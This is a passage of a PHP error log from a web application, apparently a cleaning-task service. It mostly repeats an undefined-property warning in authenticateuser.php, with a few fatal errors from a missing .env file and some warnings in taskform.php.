in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 02:43:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 03:09:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 03:14:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 04:13:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 05:12:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 06:01:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 06:20:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 06:25:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 06:29:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 06:29:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 06:30:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 07:09:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 07:59:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 08:02:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 08:21:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 08:22:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 08:52:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Aug-2024 10:45:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [14-Aug-2024 05:39:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [14-Aug-2024 13:30:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Aug-2024 03:55:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Aug-2024 04:16:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Aug-2024 05:36:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Aug-2024 06:37:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Sep-2024 11:39:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Sep-2024 11:39:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Sep-2024 11:44:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Sep-2024 11:51:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Sep-2024 12:04:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Sep-2024 04:59:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Sep-2024 12:49:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Sep-2024 13:41:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Sep-2024 14:17:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Sep-2024 02:04:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Sep-2024 06:15:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Sep-2024 07:06:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Sep-2024 07:29:28 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/ftmgc76wdee4/public_html/test/emeraltd_prod/Classes/../.env]. in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/Service/UserService.php(12): Database->__construct() #3 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Sep-2024 07:30:34 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/ftmgc76wdee4/public_html/test/emeraltd_prod/Classes/../.env]. in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/Service/UserService.php(12): Database->__construct() #3 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Sep-2024 07:31:28 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/ftmgc76wdee4/public_html/test/emeraltd_prod/Classes/../.env]. in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/Service/UserService.php(12): Database->__construct() #3 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Sep-2024 07:41:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/authenticateuser.php on line 19 [15-Sep-2024 07:45:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/authenticateuser.php on line 19 [15-Sep-2024 07:46:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/authenticateuser.php on line 19 [15-Sep-2024 08:02:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Sep-2024 08:03:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Sep-2024 08:04:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Sep-2024 09:56:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Sep-2024 12:37:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 04:10:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 06:29:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 07:45:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 09:12:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 09:31:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 11:18:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:11:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:27:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:29:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:35:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:37:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:37:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:39:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:40:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:43:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:44:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:50:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:59:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:59:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 13:13:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 13:14:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 13:44:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 13:46:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 03:06:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 03:17:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 03:19:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 03:21:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 03:22:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:16:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:20:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:27:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:27:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:28:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:29:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:30:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:30:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:36:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:37:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 05:33:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 05:58:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 07:37:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Sep-2024 01:09:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Sep-2024 03:56:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Sep-2024 05:06:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Sep-2024 05:43:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 00:24:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 01:27:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 01:28:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 01:38:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 01:59:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 02:43:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 03:18:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 05:27:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 06:22:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 06:23:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 06:25:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 06:58:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [21-Sep-2024 04:23:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [21-Sep-2024 04:42:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 04:36:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 05:20:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 10:26:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 11:18:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 13:21:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 15:27:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 17:27:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 23:33:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 23:55:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 01:13:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 01:23:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 01:36:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 01:37:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 01:47:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 02:02:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 02:19:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 02:23:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 02:48:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 03:02:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 03:10:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 03:29:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 03:39:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 04:03:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 04:09:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 04:54:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 05:44:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 05:49:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 06:09:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 06:11:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 06:23:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 06:27:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 06:38:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 06:52:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 07:15:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 07:16:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 08:01:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 08:20:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 08:22:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 08:22:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 08:33:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 18:39:46 Australia/Sydney] PHP Warning: Attempt to read property "assignedCleaneremail" on bool in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 198 [23-Sep-2024 18:41:19 Australia/Sydney] PHP Warning: Attempt to read property "assignedCleaneremail" on bool in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 198 [23-Sep-2024 18:46:40 Australia/Sydney] PHP Warning: Attempt to read property "assignedCleaneremail" on bool in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 198 [23-Sep-2024 08:57:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 09:56:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 09:57:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 10:52:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 13:37:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 14:52:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 19:19:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 22:53:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 01:19:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 01:30:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 01:48:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 02:36:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 03:19:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 03:34:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 04:32:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 04:34:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 04:40:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 05:41:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 05:51:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 05:51:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 05:52:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 05:54:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 06:12:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 06:18:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 06:21:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 07:16:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 07:52:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 08:14:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 08:37:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 08:43:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 09:13:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 10:16:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 10:54:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 12:28:30 UTC] PHP Warning: Undefined property: 